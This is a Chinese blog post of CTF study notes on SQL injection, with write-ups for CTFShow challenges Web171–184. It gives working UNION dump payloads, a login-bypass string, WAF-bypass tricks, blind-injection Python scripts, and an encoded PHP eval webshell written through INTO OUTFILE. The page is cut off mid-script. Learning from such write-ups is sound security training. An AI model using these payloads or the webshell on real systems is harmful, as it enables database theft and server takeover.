<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="SQL注入常用姿势总结       在刷CTFShow的时候总结一下常用的SQL注入姿势~">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入总结">
<meta property="og:url" content="http://yan5ui.github.io/2023/06/29/SQLi%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="yansui&#39;s blogs">
<meta property="og:description" content="SQL注入常用姿势总结       在刷CTFShow的时候总结一下常用的SQL注入姿势~">
<meta property="og:locale">
<meta property="article:published_time" content="2023-06-29T08:48:49.779Z">
<meta property="article:modified_time" content="2023-06-29T09:03:42.754Z">
<meta property="article:author" content="yansui">
<meta name="twitter:card" content="summary"><title>SQL注入总结 | yansui's blogs</title><link ref="canonical" href="http://yan5ui.github.io/2023/06/29/SQLi%E6%80%BB%E7%BB%93/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">yansui的小窝</div><div class="header-banner-info__subtitle">一个成长中的ctfer</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">SQL注入总结</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2023-06-29</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2023-06-29</span></span></div></header><div class="post-body">
        <h1 id="SQL注入常用姿势总结"   >
          <a href="#SQL注入常用姿势总结" class="heading-link"><i class="fas fa-link"></i></a><a href="#SQL注入常用姿势总结" class="headerlink" title="SQL注入常用姿势总结"></a>SQL注入常用姿势总结</h1>
      <p>在刷CTFShow的时候总结一下常用的SQL注入姿势~</p>
<span id="more"></span>
<p>首先需要注意的是在注入的过程中经常需要使用单行注释语句来闭合后面不想用的SQL语句，但是对于不同的数据库管理系统，适用的注释语句不同，常用的有以下这些：</p>
<blockquote>
<p>MySQL &#x2F; MariaDB:<br>使用双减号 (–) 或井号 (#) 进行注释。<br>Oracle:<br>使用双减号 (–)或者 –+ 或双斜线 (&#x2F;&#x2F;) 进行注释。<br>SQL Server:<br>使用双减号 (–) 进行注释。<br>PostgreSQL:<br>使用双减号 (–) 进行注释。<br>SQLite:<br>使用双减号 (–) 进行注释。</p>
</blockquote>
<p>在尝试注入的过程中可以多多尝试几种。</p>

        <h2 id="一、数字型-amp-字符型注入（无过滤）"   >
          <a href="#一、数字型-amp-字符型注入（无过滤）" class="heading-link"><i class="fas fa-link"></i></a><a href="#一、数字型-amp-字符型注入（无过滤）" class="headerlink" title="一、数字型&amp;字符型注入（无过滤）"></a>一、数字型&amp;字符型注入（无过滤）</h2>
      <p>代表语句：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;select username,password from user where username !=&#x27;flag&#x27; and id = &#x27;&quot;</span>.<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>].<span class="string">&quot;&#x27; limit 1;&quot;</span>;</span><br></pre></td></tr></table></div></figure>
<p>常用的注入语句:</p>
<p>1、获得数据库名</p>
<p><code>-1&#39; union select 1,2,database();--+</code></p>
<p>2、获取数据库中的表名：</p>
<p><code>-1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = &#39;ctfshow_web&#39;;--+</code></p>
<p>3、获取某个表中的列名：</p>
<p><code>-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name = &#39;ctfshow_user&#39;;--+</code></p>
<p>4、获取表中的所有数据：</p>
<p><code>-1&#39; union select 1,2,group_concat(id,&#39;:&#39;,username,&#39;:&#39;,password) from ctfshow_user;--+</code></p>
<p>以上是最基础的一些SQL注入语句，可以用于在无过滤情况下获取某些可以字符型注入的数据库的全部内容。</p>
<p>有关解释：<br>1、为什么union之前是-1?<br>因为可以让原先的语句因为查询不到结果而没有回显，这样就可以只显示注入之后的结果。</p>
<p>2、union为啥要1,2,group_conat…?<br>因为union选择的列数（这里为三列）需要与select主句选择出的列数相同，1,2是凑数的，换成114514,1919810也行。</p>
<p>3、group_concat<br>用于连接所有查询的结果，注意函数中每列之间以逗号分割</p>
<p>4、information_schema<br>数据库系统中自带的一个表，记录了该数据库管理系统管理的所有数据信息。</p>

        <h2 id="二、万能密码"   >
          <a href="#二、万能密码" class="heading-link"><i class="fas fa-link"></i></a><a href="#二、万能密码" class="headerlink" title="二、万能密码"></a>二、万能密码</h2>
      <p>如果是登录类的题目，可以尝试万能密码：</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; or 1=1;--+</span></span><br><span class="line"><span class="string">ffifdyop //这一种用于使用md5储存密码的数据库</span></span><br></pre></td></tr></table></div></figure>

<p>此处需要注意的是在SQL语句中or运算符的优先级高于and。</p>

        <h2 id="三、利用SQL注入写WebShell"   >
          <a href="#三、利用SQL注入写WebShell" class="heading-link"><i class="fas fa-link"></i></a><a href="#三、利用SQL注入写WebShell" class="headerlink" title="三、利用SQL注入写WebShell"></a>三、利用SQL注入写WebShell</h2>
      <p>同样如果是无过滤的字符型注入，可以利用下面的SQL语句写WebShell:</p>
<p><code>-1&#39; union select 1,2,&quot;&lt;?php phpinfo()?&gt;&quot; into outfile &quot;/var/www/html/1.php&quot;;--+</code></p>
<p>上面的SQL语句可能还需要修改，因为这里我没有尝试成功┭┮﹏┭┮</p>
<p>下面这个应该能用</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">-1</span><span class="string">&#x27; union select 1,from_base64(&quot;%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b&quot;) into outfile &#x27;</span><span class="operator">/</span>var<span class="operator">/</span>www<span class="operator">/</span>html<span class="operator">/</span><span class="number">1.</span>php</span><br></pre></td></tr></table></div></figure>


        <h2 id="四、盲注"   >
          <a href="#四、盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#四、盲注" class="headerlink" title="四、盲注"></a>四、盲注</h2>
      <p>适用于不能直接通过回显得到flag的题目，需要使用脚本暴力破解flag，盲注的逻辑就是根据bool表达式的判断结果一位一位地猜出想要的结果。</p>
<p>例如：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">map</span>:</span><br><span class="line">        payload = <span class="string">&quot;ooo&#x27; union select &#x27;a&#x27;,if((select substr(password, &#123;&#125;, 1) from ctfshow_user5 where username = &#x27;flag&#x27;) = &#x27;&#123;&#125;&#x27;, sleep(2), 1)&#x27;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">        stime = time.time()</span><br><span class="line">        response = requests.get(url + payload)</span><br><span class="line">        etime = time.time()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(etime - stime &gt;= <span class="number">1</span>):</span><br><span class="line">            flag += j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></div></figure>

<p>这里使用到了SQL中的if子句。有关的解释：</p>
<blockquote>
<p>基本语法为<br>IF(条件表达式,值1,值2)<br>如果条件表达式为True，返回值1，为False,返回值2.<br>返回值可以是任何值，比如：数值，文本，日期，空值，NULL，数学表达式，函数等。</p>
</blockquote>
<p>有关substr函数的解释：</p>
<blockquote>
<p>SUBSTR(string ,pos,len)<br>string:指定字符串<br>pos:规定字符串从何处开始，（这里的第一个位置是1而不是0）为正数时则从字段开始出开始，为负数则从结尾出开始。<br>len:要截取字符串的长度。（是从1开始计数而不是0）</p>
</blockquote>
<p>上面的脚本就是一个时间盲注的例子：如果password的第i个字符是j，就保留这个字符，开始爆破下一位字符，直到达到长度50为止。</p>

        <h2 id="五、bypass-waf"   >
          <a href="#五、bypass-waf" class="heading-link"><i class="fas fa-link"></i></a><a href="#五、bypass-waf" class="headerlink" title="五、bypass waf"></a>五、bypass waf</h2>
      <p>下面是一些对常见过滤的绕过方法：</p>
<p>1.过滤关键词：<br>首先尝试能不能通过大写&#x2F;小写绕过，如过滤select，可以尝试SELECT<br>其次如果是把关键词替换为空，可以尝试双写绕过，如selselectect</p>
<p>还可以尝试使用正则匹配，从而使用不完整的关键字达到效果，如：<code>id=0&#39;||(password)regexp&#39;flag</code><br>有关regexp的解释：</p>
<blockquote>
<p>在SQL语句中，REGEXP是一个操作符，用于在正则表达式中进行模式匹配。<br>它可以用于WHERE子句或HAVING子句中的条件判断。</p>
</blockquote>
<p>过滤where可以尝试使用having，但是在没有group by的情况下一定需要有聚合函数，例如count。</p>
<p>实在不行就用true+…+嗯把payload凑出来，见Web185-186</p>
<p>2.过滤空格：<br>可以使用URL编码的特殊字符或者注释字符绕过，例如：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">%09  <span class="comment">#\t 水平制表</span></span><br><span class="line">%0a  <span class="comment"># 回车</span></span><br><span class="line">%0d  <span class="comment"># 换行</span></span><br><span class="line">%0c  <span class="comment"># 换页符</span></span><br><span class="line">/**/</span><br><span class="line">() //用括号包裹关键词起到分割的作用</span><br></pre></td></tr></table></div></figure>


        <h2 id="六、对输出做过滤"   >
          <a href="#六、对输出做过滤" class="heading-link"><i class="fas fa-link"></i></a><a href="#六、对输出做过滤" class="headerlink" title="六、对输出做过滤"></a>六、对输出做过滤</h2>
      
        <h3 id="过滤flag关键字"   >
          <a href="#过滤flag关键字" class="heading-link"><i class="fas fa-link"></i></a><a href="#过滤flag关键字" class="headerlink" title="过滤flag关键字"></a>过滤flag关键字</h3>
      <p>union的列中不要出现有flag的字段。</p>

        <h3 id="过滤数字"   >
          <a href="#过滤数字" class="heading-link"><i class="fas fa-link"></i></a><a href="#过滤数字" class="headerlink" title="过滤数字"></a>过滤数字</h3>
      <p>用字母代替数字回显结果，见Web174</p>

        <h3 id="过滤所有可见字符"   >
          <a href="#过滤所有可见字符" class="heading-link"><i class="fas fa-link"></i></a><a href="#过滤所有可见字符" class="headerlink" title="过滤所有可见字符"></a>过滤所有可见字符</h3>
      <p>考虑盲注，但是这种题我觉得出的不好，违反了信息安全体系的可用性原则。</p>

        <h2 id="七、题解"   >
          <a href="#七、题解" class="heading-link"><i class="fas fa-link"></i></a><a href="#七、题解" class="headerlink" title="七、题解"></a>七、题解</h2>
      <p>CTFShow Web171-253</p>

        <h3 id="Web171"   >
          <a href="#Web171" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web171" class="headerlink" title="Web171"></a>Web171</h3>
      <p>无过滤字符型注入，flag在数据库中，union注入获取即可。</p>
<p>万能密码也能用。</p>

        <h3 id="Web172"   >
          <a href="#Web172" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web172" class="headerlink" title="Web172"></a>Web172</h3>
      <p>基本上跟171一样，union的时候不要带上flag就行。</p>

        <h3 id="Web173"   >
          <a href="#Web173" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web173" class="headerlink" title="Web173"></a>Web173</h3>
      <p>和172一模一样</p>

        <h3 id="Web174"   >
          <a href="#Web174" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web174" class="headerlink" title="Web174"></a>Web174</h3>
      <p>过滤了数字，给数字replace掉。<br>payload:</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>),<span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;numf&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>),<span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;numf&#x27;</span>),<span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;numg&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>),<span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;numf&#x27;</span>),<span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;numg&#x27;</span>), <span class="string">&#x27;8&#x27;</span>,<span class="string">&#x27;numh&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>),<span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;numf&#x27;</span>),<span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;numg&#x27;</span>), <span class="string">&#x27;8&#x27;</span>,<span class="string">&#x27;numh&#x27;</span>), <span class="string">&#x27;9&#x27;</span>, <span class="string">&#x27;numi&#x27;</span>)</span><br><span class="line">replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>),<span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;numf&#x27;</span>),<span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;numg&#x27;</span>), <span class="string">&#x27;8&#x27;</span>,<span class="string">&#x27;numh&#x27;</span>), <span class="string">&#x27;9&#x27;</span>, <span class="string">&#x27;numi&#x27;</span>), <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;numj&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;qweqwe&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="string">&#x27;a&#x27;</span>,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;numa&#x27;</span>), <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;numb&#x27;</span>), <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;numc&#x27;</span>), <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;numd&#x27;</span>), <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;nume&#x27;</span>),<span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;numf&#x27;</span>),<span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;numg&#x27;</span>), <span class="string">&#x27;8&#x27;</span>,<span class="string">&#x27;numh&#x27;</span>), <span class="string">&#x27;9&#x27;</span>, <span class="string">&#x27;numi&#x27;</span>), <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;numj&#x27;</span>) <span class="keyword">from</span> ctfshow_user4 <span class="keyword">where</span> username <span class="operator">=</span> <span class="string">&#x27;flag</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web175"   >
          <a href="#Web175" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web175" class="headerlink" title="Web175"></a>Web175</h3>
      <p>过滤了所有可见字符，直接上时间盲注：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 时间盲注脚本 by yansui</span></span><br><span class="line"><span class="comment"># 第一次写Web脚本</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="built_in">map</span> = <span class="string">&quot;0123456789abcdefghijklmnopqrstuvwxyz-&#123;&#125;&quot;</span></span><br><span class="line">url = <span class="string">&quot;http://a63f1d4e-a70e-46a0-8897-ef5348193d21.challenge.ctf.show/api/v5.php?id=&quot;</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">map</span>:</span><br><span class="line">        payload = <span class="string">&quot;ooo&#x27; union select &#x27;a&#x27;,if((select substr(password, &#123;&#125;, 1) from ctfshow_user5 where username = &#x27;flag&#x27;) = &#x27;&#123;&#125;&#x27;, sleep(2), 1)&#x27;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">        stime = time.time()</span><br><span class="line">        response = requests.get(url + payload)</span><br><span class="line">        etime = time.time()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(etime - stime &gt;= <span class="number">1</span>):</span><br><span class="line">            flag += j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web176"   >
          <a href="#Web176" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web176" class="headerlink" title="Web176"></a>Web176</h3>
      <p>可以直接用万能密码<code>1&#39; or 1=1;--+</code><br>其实是过滤了select，大写绕过即可。</p>

        <h3 id="Web177"   >
          <a href="#Web177" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web177" class="headerlink" title="Web177"></a>Web177</h3>
      <p>过滤了空格<br><code>-1&#39;%0aor%0ausername=&#39;flag</code></p>

        <h3 id="Web178"   >
          <a href="#Web178" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web178" class="headerlink" title="Web178"></a>Web178</h3>
      <p>上一题的payload还可以用</p>

        <h3 id="Web179"   >
          <a href="#Web179" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web179" class="headerlink" title="Web179"></a>Web179</h3>
      <p>用%0c代替空格即可。</p>

        <h3 id="Web180"   >
          <a href="#Web180" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web180" class="headerlink" title="Web180"></a>Web180</h3>
      <p>同上</p>

        <h3 id="Web181"   >
          <a href="#Web181" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web181" class="headerlink" title="Web181"></a>Web181</h3>
      <p>过滤了注释符号，直接闭合右引号：<br>-1’||username&#x3D;’flag</p>

        <h3 id="Web182"   >
          <a href="#Web182" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web182" class="headerlink" title="Web182"></a>Web182</h3>
      <p>过滤flag,直接用正则：<br><code>id=0&#39;||(username)regexp&#39;f</code></p>

        <h3 id="Web183"   >
          <a href="#Web183" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web183" class="headerlink" title="Web183"></a>Web183</h3>
      <p>只会回显数据库中记录的条数，直接盲注跑一遍</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># author:yansui</span></span><br><span class="line"><span class="comment"># $sql = &quot;select count(pass) from &quot;.$_POST[&#x27;tableName&#x27;].&quot;;&quot;;</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="built_in">map</span> = <span class="string">&quot;0123456789abcdefghijklmnopqrstuvwxyz-&quot;</span></span><br><span class="line">url = <span class="string">&quot;http://e65ba471-f8e8-47b0-989c-3dd052691c82.challenge.ctf.show/select-waf.php&quot;</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">38</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">map</span>:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">&quot;tableName&quot;</span> : <span class="string">&quot;(ctfshow_user)where(pass)regexp(&#x27;ctfshow&#123;&quot;</span> + flag + j + <span class="string">&quot;&#x27;)&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment"># print(data)</span></span><br><span class="line">        result = requests.post(url, data=data)</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&quot;user_count = 1&quot;</span> <span class="keyword">in</span> result.text):</span><br><span class="line">            flag = flag + j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;ctfshow&#123;&quot;</span> + flag + <span class="string">&quot;&#125;&quot;</span>)</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web184"   >
          <a href="#Web184" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web184" class="headerlink" title="Web184"></a>Web184</h3>
      <p>where ban了，用having</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># author:yansui</span></span><br><span class="line"><span class="comment"># select count(*) from ctfshow_user group by pass having pass regexp 0x3132;</span></span><br><span class="line"><span class="comment"># use hex to bypass &#x27;</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://06acb236-81cc-45a8-adca-73c66964cf21.challenge.ctf.show/select-waf.php&quot;</span></span><br><span class="line"><span class="built_in">map</span> = <span class="string">&quot;0123456789abcdefghijklmnopqrstuvwyz-&quot;</span></span><br><span class="line">flag = <span class="string">&#x27;ctfshow&#123;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">asc2hex</span>(<span class="params">str_in</span>):</span><br><span class="line">    ret = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> str_in:</span><br><span class="line">        ret += <span class="built_in">hex</span>(<span class="built_in">ord</span>(i))</span><br><span class="line"></span><br><span class="line">    ret = ret.replace(<span class="string">&#x27;0x&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> ret</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span 